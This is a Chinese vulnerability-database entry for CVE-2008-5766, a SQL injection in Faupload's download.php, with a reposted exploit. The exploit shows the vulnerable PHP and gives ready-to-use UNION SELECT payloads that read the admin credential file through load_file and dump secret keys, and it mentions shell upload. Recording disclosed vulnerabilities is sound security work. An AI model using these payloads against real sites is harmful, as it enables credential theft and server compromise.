Faupload 'download.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117065 漏洞类型 SQL注入
发布时间 2008-12-16 更新时间 2009-01-29
CVE编号 CVE-2008-5766 CNNVD-ID CNNVD-200812-489
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7487
https://cxsecurity.com/issue/WLB-2009010095
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-489
|漏洞详情
Fauload是一款在web中快速搭建上传中心的软件。FarsiScriptFaupload中的download.php存在SQL注入漏洞。远程攻击者可以借助id参数,执行任意的SQL指令。
|漏洞EXP
!!..:: ZAC003 ::..!!
                    -+( Vive int Iranian WhiteHat Nomads Group )+-
-------------------------------------------------------------------------------------------
Reporter : ZAC003 From Aria-Security.Net
Script Download : http://webscripts.softpedia.com/script/Internet-Browsers-C-C/FTP/Faupload-41231.html
BUG :
+ class/download.php +
[Code]
4:    $id = $_GET['id']; //Bug Here !
5:    $how = "n";
6:    $kind = "point";
7:    $result = mysql_query("SELECT * FROM file WHERE $kind LIKE '$id' order by id DESC"); //Bug Here !
8:    while($r=mysql_fetch_array($result))
9:    {
[/Code]
[Exploit]
    Example Downlaod : http://127.0.0.1/faupload/download.php?id=c16a5320fa475530d9583c34fd356ef5
    Inject : http://127.0.0.1/faupload/download.php?id=-999'< SQL Command >/*
    For View Admin UserName,Password(./admin/pconfig.php ) : -999'/**/union/**/select/**/1,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),3,4,5,6,7,8,9/**/from/**/file/*
    For View File Name And Secret Key (PROVIDING BE) :
    For View Admin UserName,Password : -999'/**/union/**/select/**/1,name,3,4,5,6,skey,8,9/**/from/**/file/*
    Upload Shell = [Priv8 Perl Script]
    Update Ads Table(id,text): Use Update SQL Command !
[/Exploit]
-------------------------------------------------------------------------------------------
For Contact : ZAC003[at]Y![dot]Com , Aria-Security.net(Forum And Best WebBase Hacking Tools)
SpTnX : Aria-Security Team , Emperor Hacking Team , Iranian WhiteHat Nomads Group
greets : M3hd!.h4ckCity And All Member of Aria-Security

# milw0rm.com [2008-12-16]
|参考资料

来源:XF
名称:faupload-download-sql-injection(47394)
链接:http://xforce.iss.net/xforce/xfdb/47394
来源:BID
名称:32858
链接:http://www.securityfocus.com/bid/32858
来源:MILW0RM
名称:7487
链接:http://www.milw0rm.com/exploits/7487
来源:SREASON
名称:4830
链接:http://securityreason.com/securityalert/4830